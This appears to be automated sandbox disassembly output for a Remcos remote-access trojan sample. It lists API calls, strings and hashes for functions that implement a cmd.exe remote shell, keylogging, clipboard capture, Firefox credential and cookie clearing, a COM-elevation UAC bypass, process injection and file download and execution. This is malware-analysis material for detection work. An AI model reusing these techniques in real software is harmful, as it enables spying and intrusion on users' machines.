                                                    • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                    • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                    • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                    • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                    • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                    • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                    • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                                  • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004082B3
                                                  • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                                  • DeleteFileA.KERNEL32(?), ref: 0040868D
                                                    • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                                    • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                    • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                    • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                  • Sleep.KERNEL32(000007D0), ref: 00408733
                                                  • StrToIntA.SHLWAPI(00000000,00000000), ref: 00408775
                                                    • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                  • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                  • API String ID: 1067849700-181434739
                                                  • Opcode ID: d116e15542ec9ea566ddb8834446e92c621402b8b77c1a65adbef748b600aba7
                                                  • Instruction ID: f533dcafa702064eae222fc9ff54aa9327b172b3479e3db69e1c842a3252ef64
                                                  • Opcode Fuzzy Hash: d116e15542ec9ea566ddb8834446e92c621402b8b77c1a65adbef748b600aba7
                                                  • Instruction Fuzzy Hash: F04293716043016BC604FB76C9579AE77A9AF91348F80483FF542671E2EF7C9908879B
                                                  Function 0040569A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 278pipesleepfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 004056E6
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  • __Init_thread_footer.LIBCMT ref: 00405723
                                                  • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                                                  • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                  • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                  • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                                  • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                  • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660D0,00000062,004660B4), ref: 004059E4
                                                  • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                                  • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                  • CloseHandle.KERNEL32 ref: 00405A23
                                                  • CloseHandle.KERNEL32 ref: 00405A2B
                                                  • CloseHandle.KERNEL32 ref: 00405A3D
                                                  • CloseHandle.KERNEL32 ref: 00405A45
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                  • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                  • API String ID: 2994406822-18413064
                                                  • Opcode ID: 5497d89eb2bfe0b7b7afbdacb2e666ef99fa94f9d1fd0b450e67ad54fc0b207d
                                                  • Instruction ID: feb7c3e087fbbfe745e3798ef664df189eb35a760580a6c3fca7c2e5343dee52
                                                  • Opcode Fuzzy Hash: 5497d89eb2bfe0b7b7afbdacb2e666ef99fa94f9d1fd0b450e67ad54fc0b207d
                                                  • Instruction Fuzzy Hash: 1A91C271604604AFD711FB36ED42A6B369AEB84308F01443FF589A62E2DB7D9C448F6D
                                                  Function 00412132 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentProcessId.KERNEL32 ref: 00412141
                                                    • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                    • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                    • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                  • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412181
                                                  • CloseHandle.KERNEL32(00000000), ref: 00412190
                                                  • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                  • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                  • API String ID: 3018269243-13974260
                                                  • Opcode ID: b3951b22144ccdf2d4cd1ddf70918f5d541b623d2cb9c2a4b7a34346c44b0be3
                                                  • Instruction ID: f1b014459f2de55ad39b9ce4e2eab06dd530905b6b6ad57ecd0cf2e75cce6712
                                                  • Opcode Fuzzy Hash: b3951b22144ccdf2d4cd1ddf70918f5d541b623d2cb9c2a4b7a34346c44b0be3
                                                  • Instruction Fuzzy Hash: B971A23160430167C614FB72CD579AE77A4AE94308F40097FF586A21E2FFBC9A49C69E
                                                  Function 0040BB6B Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                                  • FindClose.KERNEL32(00000000), ref: 0040BC04
                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                                  • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$CloseFile$FirstNext
                                                  • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                  • API String ID: 1164774033-3681987949
                                                  • Opcode ID: 1dd2d77424a1feb7b81cbbfb01062b06d0993b8648acb28e4275aca406a32408
                                                  • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                                  • Opcode Fuzzy Hash: 1dd2d77424a1feb7b81cbbfb01062b06d0993b8648acb28e4275aca406a32408
                                                  • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                                  Function 004168FC Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80clipboardmemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenClipboard.USER32 ref: 004168FD
                                                  • EmptyClipboard.USER32 ref: 0041690B
                                                  • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                                  • GlobalLock.KERNEL32(00000000), ref: 00416934
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                                                  • CloseClipboard.USER32 ref: 00416990
                                                  • OpenClipboard.USER32 ref: 00416997
                                                  • GetClipboardData.USER32(0000000D), ref: 004169A7
                                                  • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                  • CloseClipboard.USER32 ref: 004169BF
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                  • String ID: !D@
                                                  • API String ID: 3520204547-604454484
                                                  • Opcode ID: a471b31b0e2848d44592c209c65a27511ae0bedd1fb0e9bf63a88f6136bceacb
                                                  • Instruction ID: 548dc4d81477911aad8e8b192ef25fd2d65b79b2884d290c2f7190e4363fe536
                                                  • Opcode Fuzzy Hash: a471b31b0e2848d44592c209c65a27511ae0bedd1fb0e9bf63a88f6136bceacb
                                                  • Instruction Fuzzy Hash: 23215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                                                  Function 0040BD72 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                                  • FindClose.KERNEL32(00000000), ref: 0040BE04
                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                                  • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                                  • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$Close$File$FirstNext
                                                  • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                  • API String ID: 3527384056-432212279
                                                  • Opcode ID: 0e02877a0a7a0854a613cb848fbdcbf87c912738fbad3b4f45ae5d99c19712fd
                                                  • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                                  • Opcode Fuzzy Hash: 0e02877a0a7a0854a613cb848fbdcbf87c912738fbad3b4f45ae5d99c19712fd
                                                  • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                                  Function 0040F4AF Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 210processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F4C9
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00475338), ref: 0040F4F4
                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F59E
                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                  • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F6A9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                  • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                  • API String ID: 3756808967-1743721670
                                                  • Opcode ID: 1d3c19fb237022e801d10a57cb3e4ad5faa3765b37f293df49325fb65a29b400
                                                  • Instruction ID: 73d50abc618c2a3d6a57d9d5b79267519347fdb4c989691d2635b3abfd1995a7
                                                  • Opcode Fuzzy Hash: 1d3c19fb237022e801d10a57cb3e4ad5faa3765b37f293df49325fb65a29b400
                                                  • Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                                                  Function 00419662 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0$1$2$3$4$5$6$7$VG
                                                  • API String ID: 0-1861860590
                                                  • Opcode ID: e6a777f80bf8230cc7af5635f6fa1f38021a03d05ab0836674c6e7259f08b149
                                                  • Instruction ID: 7133b754bba813e7b371628f59950815dc208a5c28e1558ec9b3f3725e93ffbd
                                                  • Opcode Fuzzy Hash: e6a777f80bf8230cc7af5635f6fa1f38021a03d05ab0836674c6e7259f08b149
                                                  • Instruction Fuzzy Hash: 9171E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                                  Function 00407538 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _wcslen.LIBCMT ref: 0040755C
                                                  • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Object_wcslen
                                                  • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                  • API String ID: 240030777-3166923314
                                                  • Opcode ID: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                  • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                                  • Opcode Fuzzy Hash: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                  • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                                                  Function 0041A7D9 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                                  • GetLastError.KERNEL32 ref: 0041A84C
                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                  • String ID:
                                                  • API String ID: 3587775597-0
                                                  • Opcode ID: 4accfa2daad176f8b5f28278118318dfa0062abe9eed3b7a7428a28b758f59c5
                                                  • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                                  • Opcode Fuzzy Hash: 4accfa2daad176f8b5f28278118318dfa0062abe9eed3b7a7428a28b758f59c5
                                                  • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                                  Function 00452690 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                                                  • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                                  • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                  • String ID: JD$JD$JD
                                                  • API String ID: 745075371-3517165026
                                                  • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                  • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                                  • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                  • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                                  Function 0040C388 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                                  • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                                  • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$CloseFile$FirstNext
                                                  • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                  • API String ID: 1164774033-405221262
                                                  • Opcode ID: e90d06a8ec93e69e400289d3d5a4f788ee45a56a67685538a4b9ff5dd8d84a81
                                                  • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                                  • Opcode Fuzzy Hash: e90d06a8ec93e69e400289d3d5a4f788ee45a56a67685538a4b9ff5dd8d84a81
                                                  • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                                  Function 0041C322 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C41F
                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C42C
                                                    • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                  • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C44D
                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                  • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C473
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                  • String ID:
                                                  • API String ID: 2341273852-0
                                                  • Opcode ID: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                  • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                                  • Opcode Fuzzy Hash: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                  • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                                  Function 00419B86 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                                  • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Find$CreateFirstNext
                                                  • String ID: 8SG$PXG$PXG$NG$PG
                                                  • API String ID: 341183262-3812160132
                                                  • Opcode ID: 0115e9c2cb1ce588966712d627a94d89128a79b5abd3d317653916e724f96c97
                                                  • Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
                                                  • Opcode Fuzzy Hash: 0115e9c2cb1ce588966712d627a94d89128a79b5abd3d317653916e724f96c97
                                                  • Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                  Function 0040A41B Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetForegroundWindow.USER32(?,?,004750F0), ref: 0040A451
                                                  • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                  • GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                                  • GetKeyState.USER32(00000010), ref: 0040A46E
                                                  • GetKeyboardState.USER32(?,?,004750F0), ref: 0040A479
                                                  • ToUnicodeEx.USER32(00475144,?,?,?,00000010,00000000,00000000), ref: 0040A49C
                                                  • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                                  • ToUnicodeEx.USER32(00475144,?,?,?,00000010,00000000,00000000), ref: 0040A535
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                  • String ID:
                                                  • API String ID: 1888522110-0
                                                  • Opcode ID: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                  • Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
                                                  • Opcode Fuzzy Hash: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                  • Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6
                                                  Function 00414005 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140D8
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140E4
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004142A5
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressCloseCreateLibraryLoadProcsend
                                                  • String ID: SHDeleteKeyW$Shlwapi.dll
                                                  • API String ID: 2127411465-314212984
                                                  • Opcode ID: 8f57745345b6b33c555390ccc76dc69042d1fc98023fb94b573a666b921eb430
                                                  • Instruction ID: 51cedef5a77654bf04fe1bae55708f30d4330cefe0c145b830acf249c6506b6e
                                                  • Opcode Fuzzy Hash: 8f57745345b6b33c555390ccc76dc69042d1fc98023fb94b573a666b921eb430
                                                  • Instruction Fuzzy Hash: 16B1F671A0430066CA14FB76DC579AF36A85F91788F40053FB906771E2EE7D8A48C6DA
                                                  Function 00449210 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
